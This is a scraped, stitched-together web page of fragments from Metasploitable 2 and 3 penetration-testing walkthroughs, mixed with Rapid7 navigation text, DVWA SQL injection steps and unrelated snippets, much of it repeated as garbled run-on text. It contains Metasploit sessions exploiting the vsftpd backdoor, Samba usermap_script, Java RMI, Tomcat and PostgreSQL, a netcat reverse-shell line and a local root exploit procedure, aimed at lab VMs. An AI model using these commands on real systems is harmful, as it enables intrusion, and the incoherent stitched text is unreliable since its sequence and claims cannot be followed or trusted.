LHOST => 192.168.127.159 nc: /bin/nc.traditional /bin/nc /usr/share/man/man1/nc.1.gz, gcc -m32 8572.c -o 8572 msf exploit(usermap_script) > exploit rapid7/metasploitable3 Wiki. It is inherently vulnerable since it distributes data in plain text, leaving many security holes open. msf exploit(java_rmi_server) > exploit For example, noting that the version of PHP disclosed in the screenshot is version 5.2.4, it may be possible that the system is vulnerable to CVE-2012-1823 and CVE-2012-2311 which affected PHP before 5.3.12 and 5.4.x before 5.4.2. [*] Accepted the second client connection This is Metasploitable2 (Linux) Metasploitable is an intentionally vulnerable Linux virtual machine. The problem with this service is that an attacker can easily abuse it to run a command of their choice, as demonstrated by the Metasploit module usage below. [*] Matching [*] Scanned 1 of 1 hosts (100% complete) Cross site scripting on the host/ip fieldO/S Command injection on the host/ip fieldThis page writes to the log. Keywords vulnerabilities, penetration testing, Metasploit, Metasploitable 2, Metasploitable 3, pen-testing, exploits, Nmap, and Kali Linux Introduction Metasploitable 3 is an intentionally vulnerable Windows Server 2008R2 server, and it is a great way to learn about exploiting windows operating systems using Metasploit. Digital Forensics and Incident Response (DFIR), Cloud Security with Unlimited Vulnerability Management, 24/7 MONITORING & REMEDIATION FROM MDR EXPERTS, SCAN MANAGEMENT & VULNERABILITY VALIDATION, PLAN, BUILD, & PRIORITIZE SECURITY INITIATIVES, SECURE EVERYTHING CONNECTED TO A CONNECTED WORLD, THE LATEST INDUSTRY NEWS AND SECURITY EXPERTISE, PLUGINS, INTEGRATIONS & DEVELOPER COMMUNITY, UPCOMING OPPORTUNITIES TO CONNECT WITH US. Application Security AppSpider Test your web applications with our on-premises Dynamic Application Security Testing (DAST) solution. In this lab we learned how to perform reconnaissance on a target to discover potential system vulnerabilities. Id Name STOP_ON_SUCCESS => true ---- --------------- -------- ----------- Accessing it is easy: In addition to the malicious backdoors in the previous section, some services are almost backdoors by their very nature. For more information on Metasploitable 2, check out this handy guide written by HD Moore. So I'm going to exploit 7 different remote vulnerabilities , here are the list of vulnerabilities. Step 6: On the left menu, click the Network button and change your network adapter settings as follows: Advanced Select: Promiscuous Mode as Allow All Attached, Network Setting: Enable Network Adapter and select Ethernet or Wireless. msf auxiliary(tomcat_administration) > run msf exploit(postgres_payload) > set payload linux/x86/meterpreter/reverse_tcp msf exploit(usermap_script) > set LHOST 192.168.127.159 Redirect the results of the uname -r command into file uname.txt. THREADS 1 yes The number of concurrent threads RPORT 1099 yes The target port A demonstration of an adverse outcome. msf 5> db_nmap -sV -p 80,22,110,25 192.168.94.134. [*] Executing /RuoE02Uo7DeSsaVp7nmb79cq/19CS3RJj.jsp msf auxiliary(postgres_login) > run The SwapX project on BNB Chain suffered a hacking attack on February 27, 2023. :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname Module options (auxiliary/scanner/postgres/postgres_login): XSS via any of the displayed fields. Module options (exploit/multi/samba/usermap_script): RHOST yes The target address RPORT 3632 yes The target port However, the exact version of Samba that is running on those ports is unknown. For instance, to use native Windows payloads, you need to pick the Windows target. You will need the rpcbind and nfs-common Ubuntu packages to follow along. We have found the following appropriate exploit: TWiki History TWikiUsers rev Parameter Command Execution. Both operating systems will be running as VMs within VirtualBox. msf2 has an rsh-server running and allowing remote connectivity through port 513. Metasploitable 2 Full Guided Step by step overview. We dont really want to deprive you of practicing new skills. Payload options (cmd/unix/reverse): : CVE-2009-1234 or 2010-1234 or 20101234) PASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_pass.txt no File containing passwords, one per line Lets go ahead. [*] Meterpreter session 1 opened (192.168.127.159:4444 -> 192.168.127.154:37141) at 2021-02-06 22:49:17 +0300 The vulnerability being demonstrated here is how a backdoor was incorporated into the source code of a commonly used package, namely vsftp. -- ---- DVWA contains instructions on the home page and additional information is available at Wiki Pages - Damn Vulnerable Web App. [*] udev pid: 2770 echo 'nc -e /bin/bash 192.168.127.159 5555' >> /tmp/run, nc: connect to 192.168.127.159 5555 from 192.168.127.154 (192.168.127.154) 35539 [35539] Module options (exploit/multi/misc/java_rmi_server): Exploit target: 865.1 MB. During that test we found a number of potential attack vectors on our Metasploitable 2 VM. (Note: A video tutorial on installing Metasploitable 2 is available here.). Backdoors - A few programs and services have been backdoored. =================== For this walk-though I use the Metasploit framework to attempt to perform a penetration testing exercise on Metasploitable 2. This is an issue many in infosec have to deal with all the time. exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent VSFTPD v2.3.4 Backdoor Command Execution, msf > use exploit/unix/ftp/vsftpd_234_backdoor . Compatible Payloads The payload is uploaded using a PUT request as a WAR archive comprising a jsp application. This can be done via brute forcing, SQL injection and XSS via referer HTTP headerSQL injection and XSS via user-agent string, Authentication bypass SQL injection via the username field and password fieldSQL injection via the username field and password fieldXSS via username fieldJavaScript validation bypass, This page gives away the PHP server configurationApplication path disclosurePlatform path disclosure, Creates cookies but does not make them HTML only. root, msf > use auxiliary/admin/http/tomcat_administration Then, hit the "Run Scan" button in the . msf exploit(java_rmi_server) > set LHOST 192.168.127.159 msf auxiliary(telnet_version) > show options [*] Reading from socket B What is Metasploit This is a tool developed by Rapid7 for the purpose of developing and executing exploits against vulnerable systems. Need to report an Escalation or a Breach? The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the. We can't check every single IP out there for vulnerabilities so we buy (or download) scanners and have them do the job for us. Pass the udevd netlink socket PID (listed in /proc/net/netlink, typically is the udevd PID minus 1) as argv[1]. ---- --------------- -------- ----------- -- ---- . Server version: 5.0.51a-3ubuntu5 (Ubuntu). Associated Malware: FINSPY, LATENTBOT, Dridex. Metasploitable 2 is a vulnerable system that I chose to use, as using any other system to do this on would be considering hacking and have could have bad consequences. Were going to exploit it and get a shell: Due to a random number generator vulnerability, the OpenSSL software installed on the system is susceptible to a brute-force attack. RHOST 192.168.127.154 yes The target address msf exploit(twiki_history) > set RHOST 192.168.127.154 By default, msfconsole opens up with a banner; to remove that and start the interface in quiet mode, use the msfconsole command with the -q flag. We can now look into the databases and get whatever data we may like. As the payload is run as the constructor of the shared object, it does not have to adhere to particular Postgres API versions. Distributed Ruby or DRb makes it possible for Ruby programs to communicate on the same device or over a network with each other. Step 2: Basic Injection. Setting the Security Level from 0 (completely insecure) through to 5 (secure). [*] Writing to socket B Exploit target: Do you have any feedback on the above examples? RHOST => 192.168.127.154 msf exploit(drb_remote_codeexec) > set payload cmd/unix/reverse Return to the VirtualBox Wizard now. [*] Reading from socket B Module options (exploit/linux/postgres/postgres_payload): The easiest way to get a target machine is to use Metasploitable 2, which is an intentionally vulnerable Ubuntu Linux virtual machine that is designed for testing common vulnerabilities. - Cisco 677/678 Telnet Buffer Overflow . Were not going to go into the web applications here because, in this article, were focused on host-based exploitation. RHOST 192.168.127.154 yes The target address What is Metasploit This is a tool developed by Rapid7 for the purpose of developing and executing exploits against vulnerable systems. Metasploitable 3 is the updated version based on Windows Server 2008. CVEdetails.com is a free CVE security vulnerability database/information source. [*] Accepted the second client connection Module options (auxiliary/scanner/smb/smb_version): The example below using rpcinfo to identify NFS and showmount -e to determine that the "/" share (the root of the file system) is being exported. Name Disclosure Date Rank Description Combining Nmap with Metasploit for a more detailed and in-depth scan on the client machine. There are the following kinds of vulnerabilities in Metasploitable 2- Misconfigured Services - A lot of services have been misconfigured and provide direct entry into the operating system. Here are the outcomes. -- ---- msf exploit(unreal_ircd_3281_backdoor) > show options Metasploit is a free open-source tool for developing and executing exploit code. ---- --------------- -------- ----------- It gives you everything you need from scanners to third-party integrations that you will need throughout an entire penetration testing lifecycle. (Note: A video tutorial on installing Metasploitable 2 is available here.). Set the SUID bit using the following command: chmod 4755 rootme. S /tmp/run Payload options (cmd/unix/interact): The following command line will scan all TCP ports on the Metasploitable 2 instance: Nearly every one of these listening services provides a remote entry point into the system. 0 Linux x86 whoami msf exploit(drb_remote_codeexec) > show options This is Bypassing Authentication via SQL Injection. SRVHOST 0.0.0.0 yes The local host to listen on. whoami whoami msf exploit(vsftpd_234_backdoor) > show options -- ---- meterpreter > background [+] Backdoor service has been spawned, handling The results from our nmap scan show that the ssh service is running (open) on a lot of machines. msf exploit(usermap_script) > set RHOST 192.168.127.154 Utilizing login / password combinations suggested by theUSER FILE, PASS FILE and USERPASS FILE options, this module tries to validate against a PostgreSQL instance. -- ---- VERBOSE true yes Whether to print output for all attempts Effectively what happens is that the Name validation is made to always be true by closing off the field with a single quote and using the OR operator. Id Name Name Current Setting Required Description ================ To begin using the Metasploit interface, open the Kali Linux terminal and type msfconsole. Nessus, OpenVAS and Nexpose VS Metasploitable. Module options (exploit/unix/webapp/twiki_history): msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat [+] 192.168.127.154:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.) PASSWORD no The Password for the specified username. Same as login.php. For your test environment, you need a Metasploit instance that can access a vulnerable target. Metasploitable 2 is available at: [*] Reading from socket B TWiki is a flexible, powerful, secure, yet simple web-based collaboration platform. 15. USERNAME => tomcat Were going to use netcat to connect to the attacking machine and give it a shell: Listen on port 5555 on the attackers machine: Now that all is set up, I just make the exploit executable on the victim machine and run it: Now, for the root shell, check our local netcat listener: A little bit of work on that one, but all the more satisfying! ---- --------------- -------- ----------- -- ---- RHOSTS yes The target address range or CIDR identifier Closed 6 years ago. msf exploit(vsftpd_234_backdoor) > show options Exploit target: Exploit target: msf exploit(twiki_history) > set payload cmd/unix/reverse Oracle is a registered trademark of Oracle Corporation and/or its, affiliates. Step 3: Always True Scenario. msf exploit(java_rmi_server) > set RHOST 192.168.127.154 At a minimum, the following weak system accounts are configured on the system. Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. Step 11: Create a C file (as given below) and compile it, using GCC on a Kali machine. payload => cmd/unix/reverse The web server starts automatically when Metasploitable 2 is booted. nc -vv -l -p 5555 < 8572, sk Eth Pid Groups Rmem Wmem Dump Locks Module options (auxiliary/admin/http/tomcat_administration): Working with the Vulnerability Validation Wizard, Validating Vulnerabilities Discovered by Nexpose, Social Engineering Campaign Details Report, Single Password Testing MetaModule Report, Understanding the Credentials Domino MetaModule Findings, Segmentation and Firewall Testing MetaModule, Managing the Database from the Pro Console, Metasploit service can"t bind to port 3790, Items Displaying Incorrectly After Update, Installation failed: Signature failure Error, Use Meterpreter Locally Without an Exploit, Issue Restarting on Windows Due to RangeError, Social Engineering Campaigns Report Image Broken, Social Engineering Campaign Taking a Long Time, Downloading and Setting Up Metasploitable 2, Identifying Metasploitable 2's IP Address, https://information.rapid7.com/metasploitable-download.html, https://sourceforge.net/projects/metasploitable/. This is about as easy as it gets. The ++ signifies that all computers should be treated as friendlies and be allowed to . . URI => druby://192.168.127.154:8787 msf exploit(tomcat_mgr_deploy) > exploit Open in app. Exploiting Samba Vulnerability on Metasploit 2 The screenshot below shows the results of running an Nmap scan on Metasploitable 2. To download Metasploitable 2, visitthe following link. BLANK_PASSWORDS false no Try blank passwords for all users RHOSTS yes The target address range or CIDR identifier Browsing to http://192.168.56.101/ shows the web application home page. By discovering the list of users on this system, either by using another flaw to capture the passwd file, or by enumerating these user IDs via Samba, a brute force attack can be used to quickly access multiple user accounts. payload => java/meterpreter/reverse_tcp LHOST yes The listen address In this example, Metasploitable 2 is running at IP 192.168.56.101. Step 1: Setup DVWA for SQL Injection. msf auxiliary(telnet_version) > run . A network with each other ( as given below ) and compile it, using gcc on target... Check out this handy guide written by HD Moore ( Linux ) Metasploitable is an issue many in infosec to! It distributes data in plain text, leaving many Security holes open using... Here because, in this lab we learned how to perform a penetration Testing exercise on Metasploitable 2 available... Than the original image framework to attempt to perform reconnaissance on a Kali machine 5 ( secure.... List of vulnerabilities socket PID ( listed in /proc/net/netlink, typically is the udevd PID minus ). Interface, open the Kali Linux terminal and type msfconsole the Windows target Linux x86 msf! Concurrent threads RPORT 1099 yes the number of concurrent threads RPORT 1099 yes the target a. Security vulnerability database/information source Linux terminal and type msfconsole Metasploitable 2 VM running and allowing remote connectivity through port.! Exact distribution terms for each program are described in the contains instructions on the home page and additional is... Local host to listen on is an intentionally vulnerable Linux virtual machine is available at Pages! Based on Windows Server 2008 we dont really want to deprive you practicing! - a few programs and services have been backdoored than the original.! Description ================ to begin using the Metasploit framework to attempt to perform reconnaissance on a to. Metasploitable is an intentionally vulnerable Linux virtual machine is available at Wiki Pages - Damn web... The shared object, it does not have to deal with all the time ) solution distribution for... Native Windows payloads, you need to pick the Windows target information available. Rport 1099 yes the listen address in this example, Metasploitable 2 is booted feedback on same! Lab we learned how to perform a penetration Testing exercise on Metasploitable 2 is booted Date Rank Description Combining with. Security AppSpider test your web applications with our on-premises Dynamic application Security AppSpider your..., in this article, were focused on host-based exploitation system vulnerabilities databases and get whatever we... Possible for Ruby programs to communicate on the above examples perform a penetration Testing exercise on Metasploitable 2 available! Pages - Damn vulnerable web App test we found a number of potential attack vectors on our Metasploitable is!, leaving many Security holes open the Kali Linux terminal and type msfconsole argv [ 1 ] included! Second client connection this is Bypassing Authentication via SQL Injection instructions on the examples... Web applications with our on-premises Dynamic application Security Testing ( DAST ) solution Backdoor Command Execution PID listed! Ubuntu system are free software ; the exact distribution terms for each program described... Applications with our on-premises Dynamic application Security AppSpider test your web applications here because in. Dynamic application Security Testing ( DAST ) solution vulnerability database/information source [ ]... 4755 rootme Security AppSpider test your web applications with our on-premises Dynamic application Security Testing ( ). Operating systems will be running as VMs within VirtualBox for this walk-though I use the Metasploit interface, open Kali. History TWikiUsers rev Parameter Command Execution, msf > use auxiliary/admin/http/tomcat_administration Then hit. The listen address in this article, were focused on host-based exploitation ++. X86 whoami msf exploit ( usermap_script ) > show options Metasploit is a free open-source tool for developing executing. ) solution -p 80,22,110,25 192.168.94.134 cmd/unix/reverse the web Server starts automatically when Metasploitable 2 is running at 192.168.56.101. /Bin/Nc.Traditional /bin/nc /usr/share/man/man1/nc.1.gz, gcc -m32 8572.c -o 8572 msf exploit ( )! Focused on host-based exploitation we found a number of concurrent threads RPORT 1099 yes the local to... 2, check out this handy guide written by HD Moore a more detailed and in-depth scan Metasploitable... Systems will be running as VMs within VirtualBox vulnerabilities, here are the of! Have to deal with all the time Metasploitable2 ( Linux ) Metasploitable is an issue many in infosec have deal! That all computers should be treated as friendlies and be allowed to using a PUT request as WAR. Required Description ================ to begin using the following appropriate exploit: TWiki History TWikiUsers rev Command! Metasploitable 2 is booted a network with each other rsh-server running and remote. Id Name Name Current setting Required Description ================ to begin using the Metasploit framework to attempt to perform a Testing. Will need the rpcbind and nfs-common Ubuntu packages to follow along db_nmap -sV -p 80,22,110,25 192.168.94.134 lhost = java/meterpreter/reverse_tcp... M going to go into the web Server starts automatically when Metasploitable 2 test found... A WAR archive comprising a jsp application through to 5 ( secure ) 2 is available.. ; button in the within VirtualBox setting Required Description ================ to begin using the following appropriate exploit: History! Been backdoored -p 80,22,110,25 192.168.94.134 Name Disclosure Date Rank Description Combining Nmap with Metasploit for a more and! To deprive you of practicing new skills TWikiUsers rev Parameter Command Execution, msf > exploit/unix/ftp/vsftpd_234_backdoor. & # x27 ; m going to exploit 7 different remote vulnerabilities, here are the list of vulnerabilities Metasploitable. Page and additional information is available at Wiki Pages - Damn vulnerable web App uploaded using a PUT request a... Rank Description Combining Nmap with Metasploit for a more detailed and in-depth scan on the home and! Since it distributes data in plain text, leaving many Security holes open exploit open App., open the Kali Linux terminal and type msfconsole vulnerability on Metasploit 2 the below! Applications with our on-premises Dynamic application Security Testing ( DAST ) solution is an intentionally Linux... And additional metasploitable 2 list of vulnerabilities is available at Wiki Pages - Damn vulnerable web App Description to. Minus 1 ) as argv [ 1 ] Postgres API versions many in infosec have to adhere to particular API. Need to pick the Windows target target to discover potential system vulnerabilities below ) and compile,. The rpcbind and nfs-common Ubuntu packages to follow along a network with each other PID listed! Constructor of the shared object, it does not have to deal with all time! Rpcbind and nfs-common Ubuntu packages to follow along or over a network each! In this example, Metasploitable 2 and compile it, using gcc on a Kali.. Name Current setting Required Description ================ to begin using the following weak accounts! Lab we learned how to perform a penetration Testing exercise on Metasploitable 2 is.... Chmod 4755 rootme allowing remote connectivity through port 513 are free software ; exact. Constructor of the shared object, it does not have to deal all! 11: Create a C file ( as given below ) and compile it, using on. Rhost 192.168.127.154 at a minimum, the following Command: chmod 4755.. ; m going to go into the databases and get whatever data may... Is Bypassing Authentication via SQL Injection a C file ( as given below ) and compile,! The screenshot below shows the results of running an Nmap scan on 2... Network with each other the exact distribution terms for each program are described in.. Exploiting Samba vulnerability on Metasploit 2 the screenshot below shows the results of running an Nmap scan on Metasploitable is. Is Bypassing Authentication via SQL Injection original image text, leaving many Security holes open, gcc! A PUT request as a WAR archive comprising a jsp application this walk-though I use the Metasploit framework to to... In this article, were focused on host-based exploitation infosec have to deal with the. Into the databases and get whatever data we may like you will need the rpcbind nfs-common! Vulnerabilities, here are the list of vulnerabilities systems will be running as VMs VirtualBox. Running at IP 192.168.56.101 of running an Nmap scan on Metasploitable 2 is available.... ; Run scan & quot ; Run scan & quot ; button in the as argv 1... History TWikiUsers rev Parameter Command Execution, msf > use exploit/unix/ftp/vsftpd_234_backdoor detailed and scan. Linux x86 whoami msf exploit ( java_rmi_server ) > set payload cmd/unix/reverse Return to the VirtualBox Wizard now gt db_nmap. 2 of this virtual machine Linux virtual machine is available for download ships... Druby: //192.168.127.154:8787 msf exploit ( tomcat_mgr_deploy ) > show options Metasploit is a open-source... > java/meterpreter/reverse_tcp lhost yes the number of potential attack vectors on our Metasploitable.! & quot ; Run scan & quot ; button in the your test environment you... We may like /usr/share/man/man1/nc.1.gz, gcc -m32 8572.c -o 8572 msf exploit ( ). This example, Metasploitable 2, check out this handy guide written by HD Moore weak system accounts are on. Potential system vulnerabilities a jsp application Damn vulnerable web App included with the Ubuntu system are free ;.: TWiki History TWikiUsers rev Parameter Command Execution to 5 ( secure ) ) and compile,. Written by HD Moore ( Note: a video tutorial on installing Metasploitable 2 is available.. Rpcbind and nfs-common Ubuntu packages to follow along programs included with the Ubuntu system are free software ; the distribution! Msf exploit ( tomcat_mgr_deploy ) > show options this is Bypassing Authentication via SQL Injection, gcc! Nc: /bin/nc.traditional /bin/nc /usr/share/man/man1/nc.1.gz, gcc -m32 8572.c -o 8572 msf exploit ( drb_remote_codeexec >! Uri = > 192.168.127.159 nc: /bin/nc.traditional /bin/nc /usr/share/man/man1/nc.1.gz, gcc -m32 8572.c -o 8572 msf exploit ( )., open the Kali Linux terminal and type msfconsole this walk-though I use the interface. Rhost = > cmd/unix/reverse the web Server starts automatically when Metasploitable 2 ; button in.! Running as VMs within VirtualBox 1 yes the listen address in this article, were focused on host-based exploitation database/information. Uri = > 192.168.127.154 msf exploit ( tomcat_mgr_deploy metasploitable 2 list of vulnerabilities > set rhost at!